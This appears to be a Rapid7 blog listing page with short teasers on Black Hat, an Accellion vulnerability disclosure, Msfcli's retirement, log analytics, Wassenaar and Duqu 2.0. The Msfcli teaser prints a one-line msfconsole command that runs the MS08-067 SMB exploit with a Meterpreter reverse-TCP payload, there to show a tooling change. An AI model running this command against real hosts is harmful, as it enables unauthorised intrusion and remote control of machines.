3 min
Events
The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat
If you're like me, you have wanted to go to Black Hat
for ages. If you're going, have a game plan. For
first timers, this series will be a primer full of guidance and survival tips.
For returning attendees, this will help maximize your experience at Black Hat.
First, I want to give you perspective on my bias, coloring guidance offered
here. My slant is that of someone who was a booth babe (sales engineer), a
speaker, an attendee, Review Board member and former Gen
4 min
Vulnerability Disclosure
R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
This disclosure covers two issues discovered with the Accellion
File Transfer Appliance, a device used for secure
enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure
vulnerability, and issue R7-2015-08.2 is remote command execution vulnerability.
Metasploit modules have been released for both issues, as of Pull Request 5694
.
According to the vendor, both issues were addressed in version
1 min
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run"
You can also leverage things like resource scripts o
4 min
IT Ops
Ditch the Debugger and Use Log Analysis Instead
This guest blog post is written by Matthew Skelton, Co-founder and Principal
Consultant at Skelton Thatcher Consulting.
--------------------------------------------------------------------------------
Summary: As a Developer, you cannot attach the debugger to your application in
Production, but you can use logging in a way that helps you easily diagnose
problems in both development AND Production. You also get to make friends with
Operations people – win! The applications we’re developing and
1 min
IT Ops
10 Best Practices for Log Management & Analytics: Part 1
This 3-part series covers Logentries’ 10 best practices for log management and
analytics. To download the complete article, click here
.
As applications, hosting environments and infrastructure continue to grow in
size and complexity, having a well defined set of logging strategies and
practices is more important than ever.
In Logentri
2 min
IT Ops
Using Log Data Streams for Real-Time Analytics: Part 1
This 3-part series explores the definition and benefits of using log data
streams and real-time analytics for some common IT Ops uses cases. To download
the complete article,click here
.
Analytics tools are often focused on analyzing historical data. Taking a sample
of data from historical events, you can perform calculations to determine what
happened during that period of time and report on you
6 min
IT Ops
How to Implement ANTLR4 Autocomplete
Antlr4 is a new iteration of a popular Antlr parse tree
generator. Antlr4 features great documentation
and an in-depth book
on the
subject. However, the topic of autocompletion lacks any substantive material. I
hope this article will steer you in the right direction if you are looking to
implement autocomplete functionality
3 min
Metasploit Weekly Wrapup
Weekly Metasploit Wrapup: Two More Flash Exploits
While Adobe has made great progress in releasing both regular and emergency updates to Flash, it's becoming clear that Flash itself is becoming an albatross around the neck of every browser.
1 min
Discover Assets Dynamically with Infoblox DHCP
A highlight of the Nexpose 5.15 release is the addition of Infoblox Trinzic DDI
to the growing list of Dynamic Discovery sources. With nearly 8,000 customers
worldwide, Infoblox is a market leader in DNS, DHCP and IP address management.
Building upon existing support for Microsoft DHCP log monitoring, released this
past spring, Nexpose customers that use Infoblox to manage DHCP activity can now
detect previously unknown devices whenever they connect to the network,
providing a more complete un
2 min
IT Ops
Announcing Logentries as Google Cloud Platform's First Log Analytics Partner
Today we’re excited to announce
our partnership with Google Cloud Platform, making Logentries
the first provider of log analytics for Google Cloud
customers.
Logentries’ Google Cloud integration enables Google customers to perform
advanced analysis on their log data,
3 min
IT Ops
Introducing Logentries NEW Query Language: LEQL
We are excited to announce that Logentries’ new SQL-like query language, LEQL,
is now available
for more advanced analytics and easy extraction of valuable insights from your
log data.
A SQL-Like Query Language
If you’ve ever used SQL, LEQL should feel familiar. In fact, Logentries already
supports a number of SQL-like search functions, including:
* SUM: Sums a set of values
*
2 min
IT Ops
How to Log with the Docker Logentries Container
Logentries offers a variety of ways to get logs out of your containerized
environment , including our
Linux Agent, application plugin libraries, and Syslog. In this post we’ll cover
collecting and forwarding logs via our Docker Logentries Container, which
requires Docker 1.5 or higher.
To configure the Docker Logentries Container you’ll need to do the following:
* Create a destination log in your Logentries account to record your Docker
lo
8 min
Metasploit
Wassenaar Arrangement - Frequently Asked Questions
The purpose of this post is to help answer questions about the Wassenaar
Arrangement. You can find the US proposal for implementing the Arrangement here
,
and an accompanying FAQ from the Bureau of Industry and Security (BIS) here
. For Rapid7's
take on Wassenaar, and information on the comments we intend to submit to BIS,
please read this companion pie
2 min
Malware
What Exactly is Duqu 2.0?
Overview:
Duqu, a very complex and modular malware platform thought to have gone dark in
late 2012, has made its appearance within the environment of Kaspersky Labs.
Dubbed “Duqu 2.0” by Kaspersky, the level of complexity found within the malware
represents a high level of sophistication, skill, funding and motivation seen by
nation-sponsored actors. Infections related to this malware have reveale
3 min
How to be a Combination King
I recently spent a wonderful week in London to participate in Infosecurity
Europe as part of a larger group of
internationally-based Rapid7 employees. If you've been to many events, you know
that vendors quite often come up with clever ways to attract people to their
booth through giveaways, technical presentations, and product demonstrations.
Lucky for me, our booth happened to be right next to a vendor who had a rather
neat contest involving a keypad lock